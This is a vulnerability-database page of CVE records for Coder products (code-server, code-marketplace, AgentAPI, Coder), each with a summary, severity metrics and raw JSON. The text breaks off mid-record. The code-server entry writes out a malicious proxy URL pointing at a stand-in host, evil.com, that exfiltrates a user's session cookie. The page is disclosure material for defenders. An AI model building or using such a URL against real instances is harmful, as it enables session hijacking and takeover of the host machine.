Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
9 vulnerabilities by coder
CVE-2026-35454 (GCVE-0-2026-35454)
Vulnerability from cvelistv5 – Published: 2026-04-06 21:51 – Updated: 2026-04-07 15:08
VLAI
Title
Code Extension Marketplace has a Zip Slip Path Traversal
Summary
The Code Extension Marketplace is an open-source alternative to the VS Code Marketplace. Prior to 2.4.2, Zip Slip vulnerability in coder/code-marketplace allowed a malicious VSIX file to write arbitrary files outside the extension directory. ExtractZip passed raw zip entry names to a callback that wrote files via filepath.Join with no boundary check; filepath.Join resolved .. components but did not prevent the result from escaping the base path. This vulnerability is fixed in 2.4.2.
Severity
SSVC
Exploitation: none
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-22 - Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Assigner
References
2 references
| URL | Tags |
|---|---|
| https://github.com/coder/code-marketplace/securit… | x_refsource_CONFIRM |
| https://github.com/coder/code-marketplace/release… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| coder | code-marketplace |
Affected:
< 2.4.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2026-35454",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-07T14:35:14.881298Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T15:08:45.865Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "code-marketplace",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003c 2.4.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The Code Extension Marketplace is an open-source alternative to the VS Code Marketplace. Prior to 2.4.2, Zip Slip vulnerability in coder/code-marketplace allowed a malicious VSIX file to write arbitrary files outside the extension directory. ExtractZip passed raw zip entry names to a callback that wrote files via filepath.Join with no boundary check; filepath.Join resolved .. components but did not prevent the result from escaping the base path. This vulnerability is fixed in 2.4.2."
}
],
"metrics": [
{
"cvssV4_0": {
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 8.7,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "HIGH"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-22",
"description": "CWE-22: Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-06T21:51:53.048Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/code-marketplace/security/advisories/GHSA-8x9r-hvwg-c55h",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/code-marketplace/security/advisories/GHSA-8x9r-hvwg-c55h"
},
{
"name": "https://github.com/coder/code-marketplace/releases/tag/v2.4.2",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/code-marketplace/releases/tag/v2.4.2"
}
],
"source": {
"advisory": "GHSA-8x9r-hvwg-c55h",
"discovery": "UNKNOWN"
},
"title": "Code Extension Marketplace has a Zip Slip Path Traversal"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2026-35454",
"datePublished": "2026-04-06T21:51:53.048Z",
"dateReserved": "2026-04-02T19:25:52.193Z",
"dateUpdated": "2026-04-07T15:08:45.865Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-66411 (GCVE-0-2025-66411)
Vulnerability from cvelistv5 – Published: 2025-12-03 19:25 – Updated: 2025-12-03 21:42
VLAI
Title
Coder logged sensitive objects unsanitized
Summary
Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4.
Severity
7.8 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-532 - Insertion of Sensitive Information into Log File
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://github.com/coder/coder/security/advisorie… | x_refsource_CONFIRM |
| https://github.com/coder/coder/commit/e2a46393fce… | x_refsource_MISC |
| https://github.com/coder/coder/releases/tag/v2.26.5 | x_refsource_MISC |
| https://github.com/coder/coder/releases/tag/v2.27.7 | x_refsource_MISC |
| https://github.com/coder/coder/releases/tag/v2.28.4 | x_refsource_MISC |
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-66411",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-12-03T21:41:56.452426Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T21:42:17.349Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coder",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.28.0, \u003c 2.28.4"
},
{
"status": "affected",
"version": "\u003e= 2.27.0, \u003c 2.27.7"
},
{
"status": "affected",
"version": "\u003c 2.26.5"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Coder allows organizations to provision remote development environments via Terraform. Prior to 2.26.5, 2.27.7, and 2.28.4, Workspace Agent manifests containing sensitive values were logged in plaintext unsanitized. An attacker with limited local access to the Coder Workspace (VM, K8s Pod etc.) or a third-party system (SIEM, logging stack) could access those logs. This vulnerability is fixed in 2.26.5, 2.27.7, and 2.28.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-532",
"description": "CWE-532: Insertion of Sensitive Information into Log File",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-12-03T19:25:24.207Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/coder/security/advisories/GHSA-jf75-p25m-pw74"
},
{
"name": "https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/e2a46393fce40bc630df3293c1ee66a596277289"
},
{
"name": "https://github.com/coder/coder/releases/tag/v2.26.5",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/releases/tag/v2.26.5"
},
{
"name": "https://github.com/coder/coder/releases/tag/v2.27.7",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/releases/tag/v2.27.7"
},
{
"name": "https://github.com/coder/coder/releases/tag/v2.28.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/releases/tag/v2.28.4"
}
],
"source": {
"advisory": "GHSA-jf75-p25m-pw74",
"discovery": "UNKNOWN"
},
"title": "Coder logged sensitive objects unsanitized"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-66411",
"datePublished": "2025-12-03T19:25:24.207Z",
"dateReserved": "2025-11-28T23:33:56.366Z",
"dateUpdated": "2025-12-03T21:42:17.349Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-59956 (GCVE-0-2025-59956)
Vulnerability from cvelistv5 – Published: 2025-09-29 23:57 – Updated: 2025-09-30 14:14
VLAI
Title
AgentAPI exposed user chat history via a DNS rebinding attack
Summary
AgentAPI is an HTTP API for Claude Code, Goose, Aider, Gemini, Amp, and Codex. Versions 0.3.3 and below are susceptible to a client-side DNS rebinding attack when hosted over plain HTTP on localhost. An attacker can gain access to the /messages endpoint served by the Agent API. This allows for the unauthorized exfiltration of sensitive user data, specifically local message history, which can include secret keys, file system contents, and intellectual property the user was working on locally. This issue is fixed in version 0.4.0.
Severity
6.5 (Medium)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-350 - Reliance on Reverse DNS Resolution for a Security-Critical Action
Assigner
References
7 references
| URL | Tags |
|---|---|
| https://github.com/coder/agentapi/security/adviso… | x_refsource_CONFIRM |
| https://github.com/coder/agentapi/pull/49 | x_refsource_MISC |
| https://github.com/coder/agentapi/commit/5c425c62… | x_refsource_MISC |
| https://github.blog/security/application-security… | x_refsource_MISC |
| https://github.com/coder/agentapi/releases/tag/v0.4.0 | x_refsource_MISC |
| https://mcpsec.dev/advisories/2025-09-19-coder-ch… | x_refsource_MISC |
| https://mcpsec.dev/advisories/2025-09-19-coder-ch… | exploit |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-59956",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-30T14:14:39.407205Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-30T14:14:53.214Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://mcpsec.dev/advisories/2025-09-19-coder-chat-exfiltration/"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "agentapi",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003c 0.4.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "AgentAPI is an HTTP API for Claude Code, Goose, Aider, Gemini, Amp, and Codex. Versions 0.3.3 and below are susceptible to a client-side DNS rebinding attack when hosted over plain HTTP on localhost. An attacker can gain access to the /messages endpoint served by the Agent API. This allows for the unauthorized exfiltration of sensitive user data, specifically local message history, which can include secret keys, file system contents, and intellectual property the user was working on locally. This issue is fixed in version 0.4.0."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-350",
"description": "CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-29T23:57:08.133Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/agentapi/security/advisories/GHSA-w64r-2g3w-w8w4",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/agentapi/security/advisories/GHSA-w64r-2g3w-w8w4"
},
{
"name": "https://github.com/coder/agentapi/pull/49",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/agentapi/pull/49"
},
{
"name": "https://github.com/coder/agentapi/commit/5c425c62447b8a9eac19e9fc5a2eae7f0803f149",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/agentapi/commit/5c425c62447b8a9eac19e9fc5a2eae7f0803f149"
},
{
"name": "https://github.blog/security/application-security/localhost-dangers-cors-and-dns-rebinding",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.blog/security/application-security/localhost-dangers-cors-and-dns-rebinding"
},
{
"name": "https://github.com/coder/agentapi/releases/tag/v0.4.0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/agentapi/releases/tag/v0.4.0"
},
{
"name": "https://mcpsec.dev/advisories/2025-09-19-coder-chat-exfiltration",
"tags": [
"x_refsource_MISC"
],
"url": "https://mcpsec.dev/advisories/2025-09-19-coder-chat-exfiltration"
}
],
"source": {
"advisory": "GHSA-w64r-2g3w-w8w4",
"discovery": "UNKNOWN"
},
"title": "AgentAPI exposed user chat history via a DNS rebinding attack"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-59956",
"datePublished": "2025-09-29T23:57:08.133Z",
"dateReserved": "2025-09-23T14:33:49.506Z",
"dateUpdated": "2025-09-30T14:14:53.214Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-58437 (GCVE-0-2025-58437)
Vulnerability from cvelistv5 – Published: 2025-09-06 02:30 – Updated: 2025-09-08 16:45
VLAI
Title
Coder's privilege escalation vulnerability could lead to a cross workspace compromise
Summary
Coder allows organizations to provision remote development environments via Terraform. In versions 2.22.0 through 2.24.3, 2.25.0 and 2.25.1, Coder can be compromised through insecure session handling in prebuilt workspaces. Coder automatically generates a session token for a user when a workspace is started. It is automatically exposed via coder_workspace_owner.session_token. Prebuilt workspaces are initially owned by a built-in prebuilds system user. When a prebuilt workspace is claimed, a new session token is generated for the user that claimed the workspace, but the previous session token for the prebuilds user was not expired. Any Coder workspace templates that persist this automatically generated session token are potentially impacted. This is fixed in versions 2.24.4 and 2.25.2.
Severity
8.1 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
7 references
| URL | Tags |
|---|---|
| https://github.com/coder/coder/security/advisorie… | x_refsource_CONFIRM |
| https://github.com/coder/coder/pull/19667 | x_refsource_MISC |
| https://github.com/coder/coder/pull/19668 | x_refsource_MISC |
| https://github.com/coder/coder/pull/19669 | x_refsource_MISC |
| https://github.com/coder/coder/commit/06cbb2890f4… | x_refsource_MISC |
| https://github.com/coder/coder/commit/20d67d7d719… | x_refsource_MISC |
| https://github.com/coder/coder/commit/ec660907faa… | x_refsource_MISC |
Impacted products
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-58437",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-08T16:45:07.417468Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-09-08T16:45:15.915Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "coder",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003e= 2.22.0, \u003c 2.24.4"
},
{
"status": "affected",
"version": "\u003e= 2.25.0, \u003c 2.25.2"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Coder allows organizations to provision remote development environments via Terraform. In versions 2.22.0 through 2.24.3, 2.25.0 and 2.25.1, Coder can be compromised through insecure session handling in prebuilt workspaces. Coder automatically generates a session token for a user when a workspace is started. It is automatically exposed via coder_workspace_owner.session_token. Prebuilt workspaces are initially owned by a built-in prebuilds system user. When a prebuilt workspace is claimed, a new session token is generated for the user that claimed the workspace, but the previous session token for the prebuilds user was not expired. Any Coder workspace templates that persist this automatically generated session token are potentially impacted. This is fixed in versions 2.24.4 and 2.25.2."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-613",
"description": "CWE-613: Insufficient Session Expiration",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-279",
"description": "CWE-279: Incorrect Execution-Assigned Permissions",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-277",
"description": "CWE-277: Insecure Inherited Permissions",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-06T02:30:08.378Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/coder/security/advisories/GHSA-j6xf-jwrj-v5qp",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/coder/security/advisories/GHSA-j6xf-jwrj-v5qp"
},
{
"name": "https://github.com/coder/coder/pull/19667",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/pull/19667"
},
{
"name": "https://github.com/coder/coder/pull/19668",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/pull/19668"
},
{
"name": "https://github.com/coder/coder/pull/19669",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/pull/19669"
},
{
"name": "https://github.com/coder/coder/commit/06cbb2890f453cd522bb2158a6549afa3419c276",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/06cbb2890f453cd522bb2158a6549afa3419c276"
},
{
"name": "https://github.com/coder/coder/commit/20d67d7d7191a4fd5d36a61c6fc1e23ab59befc0",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/20d67d7d7191a4fd5d36a61c6fc1e23ab59befc0"
},
{
"name": "https://github.com/coder/coder/commit/ec660907faa0b0eae20fa2ba58ce1733f5f4b35a",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/coder/commit/ec660907faa0b0eae20fa2ba58ce1733f5f4b35a"
}
],
"source": {
"advisory": "GHSA-j6xf-jwrj-v5qp",
"discovery": "UNKNOWN"
},
"title": "Coder\u0027s privilege escalation vulnerability could lead to a cross workspace compromise"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-58437",
"datePublished": "2025-09-06T02:30:08.378Z",
"dateReserved": "2025-09-01T20:03:06.532Z",
"dateUpdated": "2025-09-08T16:45:15.915Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-47269 (GCVE-0-2025-47269)
Vulnerability from cvelistv5 – Published: 2025-05-09 20:59 – Updated: 2025-05-10 01:45
VLAI
Title
code-server session cookie can be extracted by having user visit specially crafted proxy URL
Summary
code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://<code-server>/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user's session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker's domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4.
Severity
8.3 (High)
SSVC
Exploitation: none
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- CWE-441 - Unintended Proxy or Intermediary ('Confused Deputy')
Assigner
References
3 references
| URL | Tags |
|---|---|
| https://github.com/coder/code-server/security/adv… | x_refsource_CONFIRM |
| https://github.com/coder/code-server/commit/47d6d… | x_refsource_MISC |
| https://github.com/coder/code-server/releases/tag… | x_refsource_MISC |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| coder | code-server |
Affected:
< 4.99.4
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-47269",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-05-10T01:44:34.818502Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-05-10T01:45:13.443Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "code-server",
"vendor": "coder",
"versions": [
{
"status": "affected",
"version": "\u003c 4.99.4"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "code-server runs VS Code on any machine anywhere through browser access. Prior to version 4.99.4, a maliciously crafted URL using the proxy subpath can result in the attacker gaining access to the session token. Failure to properly validate the port for a proxy request can result in proxying to an arbitrary domain. The malicious URL `https://\u003ccode-server\u003e/proxy/test@evil.com/path` would be proxied to `test@evil.com/path` where the attacker could exfiltrate a user\u0027s session token. Any user who runs code-server with the built-in proxy enabled and clicks on maliciously crafted links that go to their code-server instances with reference to /proxy. Normally this is used to proxy local ports, however the URL can reference the attacker\u0027s domain instead, and the connection is then proxied to that domain, which will include sending cookies. With access to the session cookie, the attacker can then log into code-server and have full access to the machine hosting code-server as the user running code-server. This issue has been patched in version 4.99.4."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-441",
"description": "CWE-441: Unintended Proxy or Intermediary (\u0027Confused Deputy\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-05-09T20:59:01.510Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/coder/code-server/security/advisories/GHSA-p483-wpfp-42cj"
},
{
"name": "https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/code-server/commit/47d6d3ada5aadef6d221f3d612401eb3dad9299e"
},
{
"name": "https://github.com/coder/code-server/releases/tag/v4.99.4",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/coder/code-server/releases/tag/v4.99.4"
}
],
"source": {
"advisory": "GHSA-p483-wpfp-42cj",
"discovery": "UNKNOWN"
},
"title": "code-server session cookie can be extracted by having user visit specially crafted proxy URL"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2025-47269",
"datePublished": "2025-05-09T20:59:01.510Z",
"dateReserved": "2025-05-05T16:53:10.371Z",
"dateUpdated": "2025-05-10T01:45:13.443Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-27918 (GCVE-0-2024-27918)
Vulnerability from cvelistv5 – Published: 2024-03-06 20:25 – Updated: 2024-08-05 18:06
VLAI
Title
Coder's OIDC authentication allows email with partially matching domain to register
Summary
Coder allows oragnizations to provision remote development environments via Terraform. Prior to versions 2.6.1, 2.7.3, and 2.8.4, a vulnerability in Coder's OIDC authentication could allow an attacker to bypass the `CODER_OIDC_EMAIL_DOMAIN` verification and create an account with an email not in the allowlist. Deployments are only affected if the OIDC provider allows users to create accounts on the provider. During OIDC registration, the user's email was improperly validated against the allowed `CODER_OIDC_EMAIL_DOMAIN`s. This could allow a user with a domain that only partially matched an allowed domain to successfully login or register. An attacker could register a domain name that exploited this vulnerability and register on a Coder instance with a public OIDC provider.
Coder instances with OIDC enabled and protected by the `CODER_OIDC_EMAIL_DOMAIN` configuration are affected. Coder instances using a private OIDC provider are not affected, as arbitrary users cannot register through a private OIDC provider without first having an account on the provider. Public OIDC providers are impacted. GitHub authentication and external authentication are not impacted. This vulnerability is remedied in versions 2.8.4, 2.7.3, and 2.6.1 All versions prior to these patches are affected by the vulnerability.*It is recommended that customers upgrade their deployments as soon as possible if they are utilizing OIDC authentication with the `CODER_OIDC_EMAIL_DOMAIN` setting.
Severity
8.2 (High)
SSVC
Exploitation: none
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-20 - Improper Input Validation
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://github.com/coder/coder/security/advisorie… | x_refsource_CONFIRM |
| https://github.com/coder/coder/commit/1171ce7add0… | x_refsource_MISC |
| https://github.com/coder/coder/commit/2ba84911f8b… | x_refsource_MISC |
| https://github.com/coder/coder/commit/2d37eb42e7d… | x_refsource_MISC |
| https://github.com/coder/coder/commit/4439a920e45… | x_refsource_MISC |
Impacted products
4 products
| Vendor | Product | Version | |
|---|---|---|---|
| coder | coder |
Affected:
>= 2.8.0, < 2.8.4
Affected: >= 2.7.0, < 2.7.3 Affected: < 2.6.1 |
|
| coder | coder |
Affected:
0 , < 2.6.1
(custom)
cpe:2.3:a:coder:coder:*:*:*:*:*:*:*:* |
|
| coder | coder |
Affected:
2.7.0 , < 2.7.3
(custom)
cpe:2.3:a:coder:coder:2.7.0:*:*:*:*:*:*:* |
|
| coder | coder |
Affected:
2.8.0 , < 2.8.4
(custom)
cpe:2.3:a:coder:coder:2.8.0:*:*:*:*:*:*:* |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:41:55.716Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/coder/coder/security/advisories/GHSA-7cc2-r658-7xpf"
},
{
"name": "https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/coder/coder/commit/1171ce7add017481d28441575024209ac160ecb0"
},
{
"name": "https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/coder/coder/commit/2ba84911f8b02605e5958d5e4a2fe3979ec50b31"
},
{
"name": "https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/coder/coder/commit/2d37eb42e7db656e343fe1f36de5ab1a1a62f4fb"
},
{
"name": "https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/coder/coder/commit/4439a920e454a82565e445e4376c669e3b89591c"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:coder:coder:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "coder",
"vendor": "coder",
"versions": [
{
"lessThan": "2.6.1",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:coder:coder:2.7.0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "coder",
"vendor": "coder",
"versions": [
{
"lessThan": "2.7.3",
"status": "affected",
"version": "2.7.0",
"versionType": "custom"
}
]
},
{
"cpes": [
"cpe:2.3:a:coder:coder:2.8.0:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "coder",
"vendor": "coder",
"versions": [
{
"lessThan": "2.8.4",
"status": "affected",
"version": "2.8.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
